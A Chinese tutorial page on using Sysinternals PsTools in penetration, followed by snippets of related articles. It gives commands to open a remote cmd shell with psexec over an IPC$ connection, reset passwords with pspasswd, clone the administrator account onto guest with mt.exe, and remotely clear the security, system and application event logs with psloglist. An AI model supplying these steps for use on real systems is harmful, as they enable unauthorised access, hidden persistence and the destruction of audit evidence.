Pstools使用
pstool的介绍 PsTools是Sysinternals Suite中一款排名靠前的一个安全管理工具套件。现在被微软收购。目前pstools中含有12款各式各样的小工具。如果将它们灵活的运用,将会在渗透中收到奇效。所有的pstool第一次运行时都会弹框。可以用–accepteula这个参数绕过。 还有所有的pstool都支持IP$,一旦IP$共享是连接的就不用输入-u 和-p这两个参数。 如何建立IP$连接。命令如下: Net user \\目标ip\ 密码 /user:用户 Net user \\192.168.1.3\ 123456 /user:test 建立后所有的ps工具都将可以不用输入用户和密码了。 其中12款工具简介如下: ◆PsExec - 远程执行进程 ◆PsFile - 显示远程打开的文件 ◆PsGetSid - 显示计算机或用户的 SID ◆PsInfo - 列出有关系统的信息 ◆PsKill - 按名称或进程 ID 终止进程 ◆PsList - 列出有关进程的详细信息 ◆PsLoggedOn - 查看在本地通过资源共享(包含所有资源)登录的用户 ◆PsLogList - 转储事件日志记录 ◆PsPasswd - 更改帐户密码 ◆PsService - 查看和控制服务 ◆PsShutdown - 关闭并重新启动(可选)计算机 ◆PsSuspend - 暂停进程
Psexec 介绍
远程获取一个cmdshell 比如我再渗透中扫描到目标机(192.168.1.3)的一个用户名(test)和密码()。 那我们的命令就是: psexec \\目标ip -u 用户名 -p 密码 进程名 psexec \\192.168.0.109 –u test –p cmd.exe
exit退出

这里看见不能空密码进行连接

限制 比guest权限大的用户都能登陆
PsExec \\192.168.0.109 -u administrator -p -c k:\ss.exe

pspasswd的应用详解
pspasswd \\192.168.0.109 -u administrator -p 123456 guest 123456 用administrator改guest的密码

pspassword妙用
首先执行D:\web|pspasswd.exe –accepteula (第一次执行,表示许可执行的意思) D:\web|pspasswd.exe administrator yueyan 就会成功修改administrator的密码。 这里能修改密码的原因是pspasswd不是调用net.exe进行密码修改。 上述介绍常常配合mt.exe进行用户克隆。这里简单介绍: (关于mt.exe的详细介绍请访问:【工具】mt.exe的详细介绍)
首先mt.exe查看用户sid,比较后看是否有克隆账户 Mt -chkuser 比较后,没有克隆账户,我们选择guest这个账户进行克隆: Mt –clone administrator guest 然后配合pspasswd修改密码: Pspasswd guest yueyan 就这样成功克隆一个账户,并能成功登陆访问。
pskill+psinfo+pslist的应用详解
pskill \\192.168.0.109 -u administrator -p cmd.exe
我再介绍psinfo的相关应用。 基本参数是: -h 显示已经安装的补丁信息 -s 显示已安装的软件信息 -d 显示磁盘信息 如果我们想看远程主机的基本信息,命令如下: psinfo –h –s –d \\192.168.1.3 –u administrator –p 123456
PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。
其他ps工具介绍: PSLOGGEDON:查看指定计算机的本地及远程登录的用户和登录时间。必须建立在IP$共享下才可以使用这个工具。 命令如下: Psloggedon –l \\192.168.1.3 PSLOGLIST:事件日志转储及管理。 这个对于渗透测试是非常有用的,它最大的特点就是远程清理系统日志。 常用: psloglist \\72.56.17.74 application -c > nul psloglist \\72.56.17.74 system -c > nul psloglist \\72.56.17.74 security -c > nul 分别是清理应用程序日志,系统运行日志,安全日志。 PSSERVICE:管理服务。 常用: psservice query messenger 查询messenger服务的相关信息。 最重要的项目是:服务名称、显示名称、服务描述、服务类型、服务状态。 psservice config messenger 查询服务的配置信息。 最重要的项目是:服务名称、服务描述、服务类型、服务启动类型、服务错误控制级别、可执行文件的路径等等。 PSSHUTDOWN:关机工具。 常用命令: Psshutdown –s –t 60秒后关机。 下面几个不常用,就介绍下: PsFile - 显示远程打开的文件 Psfile \\192.168.1.3 PsGetSid - 显示计算机或用户的 SID Psgetsid \\192.168.1.3 PsSuspend - 暂停进程 Pssuspend \\192.168.1.3 –u test –p cmd,exe
Pstools使用的更多相关文章
- pstools使用教程
pstools是sysinternals开发的一个功能强大的nt/2k远程管理工具包. 官方网址为http://www.sysinternals.com/ 下载地址为http://www.sysint ...
- pstools工具使用
该工具的目的:批量远程操作windows服务器, 个人实验的方法步骤: 1.在被远程的电脑上开通139,445端口 2.建立ipc$链接, 格式:Net use \\目标ip\ipc$ 密码 /use ...
- 内网IPC$入侵加pstools之远程控制
前言: IPC$(Internet process connection)是指内网里面的文件共享连接,通常很多机子的默认共享都是打开的,在cmd下使用命令net share可查看自己的IPC$是否打开 ...
- 学习使用PSTools工具中的psping
目录 初识PsTools psping 1.使用ICMP ping 2.使用TCP ping 3.延迟测试 4.带宽测试 5.同功能的tcping工具 总结 初识PsTools 在工作中我们都 ...
- pstools psexec mimikatz
Psexec原理 - oneVs1的专栏 - 博客频道 - CSDN.NET 在远程终端(3389.mstsc.exe).虚拟桌面中抓取密码的方法: 通常你在远程终端中运行该程序会提示:存储空间不足, ...
- [PsTools]psexec.exe使用范例-运行远程电脑程序(exe、bat等)
前置条件 先下载psexec.exe.放置到C盘根文件夹 下载地址:http://download.csdn.net/detail/whylaughing/8885893 命令范例:(注意空格) C: ...
- PowerShell vs. PsExec for Remote Command Execution
Posted by Jianpeng Mo / January 20, 2014 Monitoring and maintaining large-scale, complex, highly dis ...
- 不直接登录SharePoint服务器,通过远程直接部署WSP解决方案包
在这之前不得不说一下Sysinternals,他最初是一个网站,网站上会经常发布一些有用的系统扩展工具,之后运营这个网站的公司被微软收购.像非常著名的Procmon,AutoRuns.Process ...
- 微软极品工具箱-Sysinternals Suite
工具包由来 Sysinternals Suite是微软发布的一套非常强大的免费工具程序集,一共包括74个windows工具.Sysinternals是Winternals公司提供的免费工具,Winte ...
随机推荐
- SqlServer 多服务器管理配置报错:Ensure the agent startup account for 'x.x.x.x' has rights to login as target server, Access is denied.
SQL Server 2012配置多服务器管理时,SSMS设置一直报错,配置失败: 解决方法: 1. 为SQL Server Agent单独创建一个账号,主服务器和目标服务器都创建一样的账号 2. 把 ...
- vue 集成jTopo 处理方法
jTopo 帮助说明网站 http://www.jtopo.com/index.html 使用例子: http://www.jtopo.com/demo/helloworld.html 不建议直接安装 ...
- Jmeter测试出现端口占用情况
Jmeter测试会出现端口占用情况 这边在这里做个记录,每次都要百度查询,刚好需要整理下,我就也记录一份到这里吧.感谢大佬的文章. 参考文章:windows下Jmeter压测端口占用问题 因Windo ...
- clipboard兼容各个浏览器,不需要设置权限
解决方案:用clipboard.js插件 注意要引用clipboard.js文件 案例: 将文本赋值给剪切板 <button class="btn">Copy</ ...
- h5 安卓/IOS长按图片、文字禁止选中或弹出系统菜单 的解决方法
最近在做IM的语音功能,发现当长按录音的时候手机会弹出来系统菜单, IOS下bug形式:1)长按的标签设置为css background的形式:不会弹出菜单: 2)但是当设置为img时,系统默认识别为 ...
- IE浏览器下载后台返回的Excel文件,报错400
问题描述(见下图): 问题分析: 400是后端没有接收到请求 原因是后端高版本的tomcat不会自动对字符串进行转义 所以,前端把参数值进行转义,即encodeURI(string) 问题处理前代码( ...
- c# 构造函数举例
- jajx 传参 需要 判断的 条件
1.有没有权限. 2.数据类型 对不对 例如 id ,page 传过来时是str 类型, view中处理时需要转换成 int类型. 如果 不能转 就会报错.. 3.查询数据.数据不存在也要报错... ...
- 安装sass时遇到Failed to build gem native extension
错误信息 执行命令: sudo gem install sass时遇到下面的错误信息 Building native extensions. This could take a while... ER ...
- Wannafly挑战赛24-A-石子游戏--【思维题】
链接:https://www.nowcoder.com/acm/contest/186/A 来源:牛客网 石子游戏 时间限制:C/C++ 1秒,其他语言2秒 空间限制:C/C++ 262144K,其他 ...